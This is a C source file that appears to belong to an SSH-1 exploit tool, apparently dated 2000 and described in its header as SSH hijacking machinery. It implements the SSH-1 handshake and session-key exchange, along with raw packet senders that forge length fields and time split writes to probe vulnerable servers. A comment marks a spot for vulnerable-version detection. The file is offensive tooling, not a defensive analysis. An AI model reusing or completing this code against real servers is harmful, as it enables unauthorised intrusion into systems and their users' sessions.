/*
 * SSH hyacking machinery
 *
 * Dvorak 2000.
 */

#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>

#include "ssh-extern.h"
#include "7350brute.h"
#include "report.h"
#include "communicate.h"

typedef unsigned long int word32;

Buffer buffer_in_server;
int buffer_in_server_init = 0;

char server_version[100];
int server_major, server_minor;

char *host;
int port;

int rtt;

int id_len = 6;
unsigned char ident_string[100] = "1.2.31";

struct server_data {
	unsigned char check_bytes[8];
	RSAPublicKey host_key;
	RSAPublicKey public_key;
	int protocol_flags;
	int supported_ciphers;
	int supported_authentication;
	unsigned char session_id[16];	
} s;
int server_data_init = 0;

struct client_data {
	unsigned char session_key[SSH_SESSION_KEY_LENGTH];
	unsigned char cipher;
	int protocol_flags;
} c;
int client_data_init = 0;

int xconnect(struct sockaddr_in *server_addr)
{
	int sock;

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) 
		fatal("socket: %.100s", strerror(errno));

	if (connect(sock, (struct sockaddr *)server_addr, 
		sizeof(struct sockaddr)) < 0) 
		fatal("connect: %.100s", strerror(errno));

	return sock;	
}

void unblock_socket(int fd)
{
	if (fcntl(fd, F_SETFL, O_NONBLOCK) < 0)
		fatal("fcntl: %.100s", strerror(errno));
}

void get_ident(int fd, char *buf, int size)
{
        int i;

        for (i = 0; i < size - 1; i++) {
                if (read(fd, &buf[i], 1) != 1)
                        fatal("recieving ident.");
                if (buf[i] == '\r') {
                        buf[i] = '\n';
                        buf[i+1] = '\0';
                        break;
                } else if (buf[i] == '\n') {
                        buf[i+1] = '\0';
                        break;
                }
        }
        buf[size - 1] = '\0';
        return;
}


void exchange_ident(int server_fd)
{
	char ident[100];
	int len;
	
	get_ident(server_fd, ident, sizeof(ident));	
	verbose(2, "Sident: %s\n", ident);
	if (sscanf(ident, "SSH-%d.%d-%[^\n]\n", &server_major, &server_minor, 
		server_version) != 3) {
		fatal("server ident not parseable");
	}	

	/* XXX add vulnerable version detection here */
	/* should write 0xffff's here .. */
	strcpy(ident, "SSH-1.5-");
	len = strlen(ident);
	memcpy(ident+len, ident_string, id_len);
	len += id_len;
	ident[len] = '\n';
	len += 1;
	if (write(server_fd, ident, len) != len)
		fatal("writing ident to client: %.100s", strerror(errno));
}

#define max(a,b) (a) > (b) ? (a) : (b)

/*
 * Checks if packet in buffer is complete and of the expected type, 
 * three posibilities:
 * correct type: return 1, everything after type still in buffer
 * MSG_DEBUG: return 0, msg is printed
 * MSG_IGNORE: return 0, msg is printed
 * MSG_NONE: return 0
 * MSG_DISCONNECT: fatal
 * any thing else : fatal
 */

int is_correct_packet(Buffer *buffer, unsigned char type)
{
	unsigned char *ucp;
	unsigned int len, padded_len;
	unsigned char buf[1];
	char *p;

	/* Check if input size is less than minimum packet size. */
	if (buffer_len(buffer) < 4 + 8)
		return 0;
	/* Get length of incoming packet. */
	ucp = (unsigned char *)buffer_ptr(buffer);
	len = GET_32BIT(ucp);
	if (len < 1 + 2 + 2 || len > 256*1024)
		fatal("Bad packet length %u.", len);
	padded_len = (len + 8) & ~7;

	/* Check if the packet has been entirely received. */
	if (buffer_len(buffer) < 4 + padded_len)
		return 0;

	/* The entire packet is in buffer. */

	/* skip length */
	buffer_consume(buffer, 4);
		
	/* skip padding */
	buffer_consume(buffer, 8 - len % 8);
	/* get packet_type */
	buffer_get(buffer, &buf[0], 1);
	//error("packet of type: %d recieved", buf[0]);

	if (buf[0] == type) {
//		error("Expected type %d recieved", type);
		return 1;
	}
	switch (buf[0]) {
		case SSH_MSG_DISCONNECT:
			fatal("server disconnected: %s", 
				buffer_get_string(buffer, NULL));
			break;	/* NOT REACHED */
		case SSH_MSG_IGNORE:
		case SSH_MSG_DEBUG:
			error("server did send %s msg: %s", 
			    buf[0] == SSH_MSG_DEBUG ? "debug" : "ignore",
			    p = buffer_get_string(buffer, NULL));
			xfree(p); /* FALL THROUGH */
		case SSH_MSG_NONE:
			/* drop checksum */
			buffer_consume(buffer, 4);
			break;	/* NOT REACHED */
		default:
			fatal("non expected msg(%d) recieved from server", buf[0]);
			break;				
	}
	return 0;
}

/*
 * Does not return until correct packet has been recieved from fd
 * packet in buffer is everything starting after packet_type
 * including checksum and possibly the start of a new packet
 */
void get_specific_packet(Buffer *buffer, int fd, unsigned char type)
{
	fd_set readfds;
	unsigned char buf[1024];
	int len;

	//error("waiting for packet of type: %d", type);
	while (1) {
		FD_ZERO(&readfds);
		FD_SET(fd, &readfds);
		select(fd + 1, &readfds, NULL, NULL, NULL);
		len = read(fd, buf, 1024);
		if (len < 0) 
			fatal("read: %s", strerror(errno));
		buffer_append(buffer, buf, len);
		if (is_correct_packet(buffer, type)) 
			return;
	}
}

/*
 returns 1 of server keys have changed since last connect 0 otherwise
 */
int get_server_public_key(Buffer *buffer, int fd)
{
	int i;
	struct server_data S;
	int changed = 0;

	get_specific_packet(buffer, fd, SSH_SMSG_PUBLIC_KEY);
	/* Safe server data into server_data stucture */
	for (i = 0; i < 8; i++)
		s.check_bytes[i] = buffer_get_char(buffer);
	/* get the public key */
	S.public_key.bits = buffer_get_int(buffer);
	mpz_init(&S.public_key.e); 
	buffer_get_mp_int(buffer, &S.public_key.e);
	mpz_init(&S.public_key.n); 
	buffer_get_mp_int(buffer, &S.public_key.n);
	
	/* get the public key */
	S.host_key.bits = buffer_get_int(buffer);
	mpz_init(&S.host_key.e); 
	buffer_get_mp_int(buffer, &S.host_key.e);
	mpz_init(&S.host_key.n); 
	buffer_get_mp_int(buffer, &S.host_key.n);
	
	s.protocol_flags = buffer_get_int(buffer);
	s.supported_ciphers = buffer_get_int(buffer);
	s.supported_authentication = buffer_get_int(buffer);

	/* consume checksum at the end */
	buffer_consume(buffer, 4);	
	/* Compute the session id. */
	compute_session_id(s.session_id, s.check_bytes, S.host_key.bits, 
	                   &S.host_key.n, S.public_key.bits, &S.public_key.n);

	//error("public bits: %d host bits: %d", s.public_key.bits, s.host_key.bits);
	/* first connect */
	if (server_data_init == 1) {
		/* check if key is changed */
		if (mpz_cmp(&S.host_key.e, &s.host_key.e) ||
		    mpz_cmp(&S.host_key.n, &s.host_key.n) ||
		    mpz_cmp(&S.public_key.e, &s.public_key.e) ||
		    mpz_cmp(&S.public_key.n, &s.public_key.n) ||
		    (S.public_key.bits != s.public_key.bits) ||
		    (S.host_key.bits != s.host_key.bits)) {
			mpz_clear(&s.host_key.e);
			mpz_clear(&s.host_key.n);
			mpz_clear(&s.public_key.e);
			mpz_clear(&s.public_key.n);
			/* will be reinitialized */
			server_data_init = 0;
			changed++;
		} else { /* host_key has changed */
			mpz_clear(&S.host_key.e);
			mpz_clear(&S.host_key.n);
			mpz_clear(&S.public_key.e);
			mpz_clear(&S.public_key.n);
		}
	}
	if (server_data_init == 0) {
		server_data_init++;
		/* safe keys for future reference */
		s.host_key = S.host_key;
	 	s.public_key = S.public_key;
	}	
	return changed;
}

void start_packet(Buffer *buffer, unsigned char type)
{
	char buf[9];
	buffer_clear(buffer);

	memset(buf, 0, 8);
	buf[8] = type;
	buffer_append(buffer, buf, 9);
}

void send_packet(Buffer *buffer, int out_fd)
{
	unsigned char buf[4];
	unsigned int len, padding, checksum;
	Buffer buffer_out;
	fd_set writefds;

	buffer_init(&buffer_out);

	/* len + checksum - padding */
	len = buffer_len(buffer) + 4 - 8;	
	padding = 8 - len % 8;
	buffer_consume(buffer, 8 - padding);
	checksum = crc32((unsigned char *) buffer_ptr(buffer), 
	                  buffer_len(buffer));	
	PUT_32BIT(buf, checksum);
	buffer_append(buffer, buf, 4);
	PUT_32BIT(buf, len);
	buffer_clear(&buffer_out);
	buffer_append(&buffer_out, buf, 4);
	buffer_append(&buffer_out, buffer_ptr(buffer), buffer_len(buffer));
	buffer_clear(buffer);

	while (buffer_len(&buffer_out)) {
		FD_ZERO(&writefds);
		FD_SET(out_fd, &writefds);
		select(out_fd + 1, NULL, &writefds, NULL, NULL);
		len = write(out_fd, buffer_ptr(&buffer_out), 
		      buffer_len(&buffer_out));
		if (len < 0)
			fatal("write: %s", strerror(errno));
		buffer_consume(&buffer_out, len);
	}
	/* no longer needed */
	buffer_free(&buffer_out);
}


void send_session_key(int server_fd)
{
	MP_INT key;	
	int i;
	Buffer buffer;

	/* According to the protocol spec, the first byte of the session key is
	   the highest byte of the integer.  The session key is xored with the
	   first 16 bytes of the session id. */

	mpz_init_set_ui(&key, 0);
	for (i = 0; i < SSH_SESSION_KEY_LENGTH; i++) {
		mpz_mul_2exp(&key, &key, 8);
		if (i < 16)
			mpz_add_ui(&key, &key, c.session_key[i] ^ s.session_id[i]);
		else
			mpz_add_ui(&key, &key, c.session_key[i]);
	}

	/* Encrypt the integer using the public key and host key of the server
	   (key with smaller modulus first). */
	if (mpz_cmp(&s.public_key.n, &s.host_key.n) < 0) {
		/* Public key has smaller modulus. */

		rsa_public_encrypt(&key, &key, &s.public_key);
		rsa_public_encrypt(&key, &key, &s.host_key);
	} else {
		/* Host key has smaller modulus (or they are equal). */

		rsa_public_encrypt(&key, &key, &s.host_key);
		rsa_public_encrypt(&key, &key, &s.public_key);
	}

	buffer_init(&buffer);
	start_packet(&buffer, SSH_CMSG_SESSION_KEY);
	buffer_put_char(&buffer, c.cipher);
	for (i = 0; i < 8; i++)
		buffer_put_char(&buffer, s.check_bytes[i]);
	buffer_put_mp_int(&buffer, &key);
	buffer_put_int(&buffer, c.protocol_flags);
	send_packet(&buffer, server_fd);
	buffer_free(&buffer);
	mpz_clear(&key);
}

/*
 * read up to 4096 bytes from fd and appends them to buffer
 * if read_data is called fd must either be blocking or the caller has to be 
 * sure data is available
 */
void read_data(Buffer *buffer, int fd)
{
	unsigned char buf[4096];
	int len;
	
	len = read(fd, buf, 4096);
	if (len < 0)
		fatal("read_data read: %s", strerror(errno));
	if (len == 0)
		fatal("connection closed for fd = %d", fd);
	buffer_append(buffer, buf, len);
}

/*
 * write up to 4096 bytes to fd and consumes them from buffer
 * if write_data is called fd must either be blocking or the caller has to be 
 * sure it is possible to write to fd 
 */
void write_data(Buffer *buffer, int fd)
{
	int len;
	
	while (buffer_len(buffer)) {
		len = write(fd, buffer_ptr(buffer), buffer_len(buffer));
		if (len < 0)
			fatal("write_data write: %s", strerror(errno));
		buffer_consume(buffer, len);
	}
}


int start_session(void)
{
	struct sockaddr_in server_addr;
	unsigned char buffer[4096];
	int left;
	int fd;
	int changed;

	if (client_data_init++ == 0) {
		memset(c.session_key, 0, sizeof(c.session_key));
#define SSH_CIPHER_3DES 3
		c.cipher = SSH_CIPHER_3DES;
		c.protocol_flags = SSH_PROTOFLAG_SCREEN_NUMBER | 
		                   SSH_PROTOFLAG_HOST_IN_FWD_OPEN;
	}
	if (buffer_in_server_init++ == 0) {
		buffer_init(&buffer_in_server);
	}

	server_addr.sin_family = AF_INET;
	server_addr.sin_addr.s_addr = inet_addr(host);
	server_addr.sin_port = htons(port);

	fd = xconnect(&server_addr);

	exchange_ident(fd);
	changed = get_server_public_key(&buffer_in_server, fd);
	send_session_key(fd);
	/* 
	 get the SSH_SMSG_SUCCESS packet, we can't read it since we 
	 don't support encryption i
	 */
	read(fd, buffer, 4);
	left = GET_32BIT(buffer);
	left = (left + 8) & ~7;
	while (left) {
		if (read(fd, buffer, 1) == 1) 
			left--;
		else 
			fatal("no responce\n");
	}
	/* XXX until the rest of the code is changed */
	if (changed) {	
		error("remote host key has changed, h might have too\n");
		changed = 0;
	}
	if (changed) {
		fd |= HOSTKEYCHANGED;	/* this is bigger then any fd */
	}
	return fd;
}

/*
 sends a packet, padding is added at the end 
 padded_len = (len + 8) & ~7;
 len = padded_len | 7 - 8
 */
void raw_send_packet(unsigned char *data, int len, int fd)
{
	Buffer buffer;
	unsigned char length[4];

	buffer_init(&buffer);
	buffer_clear(&buffer);
	PUT_32BIT(length, (len | 7) - 8);
	buffer_append(&buffer, length, 4);
	buffer_append(&buffer, data, len);
	write_data(&buffer, fd);
	buffer_free(&buffer);
}

void raw_send_packet_spec(unsigned char *data, int len, int fd, int spec)
{
	Buffer buffer;
	unsigned char length[4];

	buffer_init(&buffer);
	buffer_clear(&buffer);
	PUT_32BIT(length, (len | 7) - 8);
	buffer_append(&buffer, length, 4);
	buffer_append(&buffer, data, len - spec);
	write_data(&buffer, fd);
	/* should be enough to let all data flow through */
	/* XXX adjust on sloooooow link */
	sleep(rtt);
	buffer_append(&buffer, data+len - spec, spec);
	write_data(&buffer, fd);
	buffer_free(&buffer);
}

void sock_close(int fd)
{
	shutdown(fd, 2);
	close(fd);
}
